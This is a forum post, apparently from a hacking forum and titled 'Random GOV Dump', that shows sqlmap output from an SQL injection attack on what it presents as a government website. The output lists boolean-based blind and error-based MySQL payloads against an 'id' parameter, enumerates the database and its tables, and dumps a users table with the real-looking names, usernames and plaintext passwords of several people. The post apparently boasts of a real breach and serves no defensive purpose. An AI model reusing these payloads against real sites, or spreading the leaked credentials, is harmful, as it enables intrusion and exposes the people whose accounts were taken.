Random ''GOV'' Dump 12-05-2012, 12:03 PM
#1
Code:
sqlmap identified the following injection points with a total of 28 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=581 AND 8534=8534
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=581 AND (SELECT 6560 FROM(SELECT COUNT(*),CONCAT(CHAR(58,114,114,115,58),(SELECT (CASE WHEN (6560=6560) THEN 1 ELSE 0 END)),CHAR(58,107,116,122,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
---
available databases [2]:
[*] dpeago_db2
[*] information_schema
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=581 AND 8534=8534
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=581 AND (SELECT 6560 FROM(SELECT COUNT(*),CONCAT(CHAR(58,114,114,115,58),(SELECT (CASE WHEN (6560=6560) THEN 1 ELSE 0 END)),CHAR(58,107,116,122,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
---
Database: dpeago_db2
[9 tables]
+----------------+
| Navigation |
| Survey_2008 |
| content |
| sitecontent |
| subscribers |
| tblStats |
| tempnavigation |
| tools |
| users |
+----------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=581 AND 8534=8534
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=581 AND (SELECT 6560 FROM(SELECT COUNT(*),CONCAT(CHAR(58,114,114,115,58),(SELECT (CASE WHEN (6560=6560) THEN 1 ELSE 0 END)),CHAR(58,107,116,122,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
---
Database: dpeago_db2
Table: users
[8 columns]
+-----------+--------------+
| Column | Type |
+-----------+--------------+
| Active | char(2) |
| Created | datetime |
| FirstName | varchar(250) |
| ID | int(11) |
| Modified | datetime |
| Password | varchar(50) |
| Surname | varchar(250) |
| UserName | varchar(50) |
+-----------+--------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=581 AND 8534=8534
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=581 AND (SELECT 6560 FROM(SELECT COUNT(*),CONCAT(CHAR(58,114,114,115,58),(SELECT (CASE WHEN (6560=6560) THEN 1 ELSE 0 END)),CHAR(58,107,116,122,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
---
Database: dpeago_db2
Table: users
[3 entries]
+--------+---------------------+-----------+----+---------------------+----------+---------+----------+
| Active | Created | FirstName | ID | Modified | Password | Surname | UserName |
+--------+---------------------+-----------+----+---------------------+----------+---------+----------+
| 1 | 2006-05-02 00:00:00 | Andrew | 1 | 2006-05-02 00:00:00 | andrew | Vester | andrew |
| None | 0000-00-00 00:00:00 | None | 2 | 0000-00-00 00:00:00 | None | None | None |
| 1 | 2005-02-21 00:00:00 | Tshepo | 5 | 2005-02-21 00:00:00 | tc | Tshepo | tc |
+--------+---------------------+-----------+----+---------------------+----------+---------+----------+
./occupy
![[Image: yTHZBDS.png]](http://i.imgur.com/yTHZBDS.png)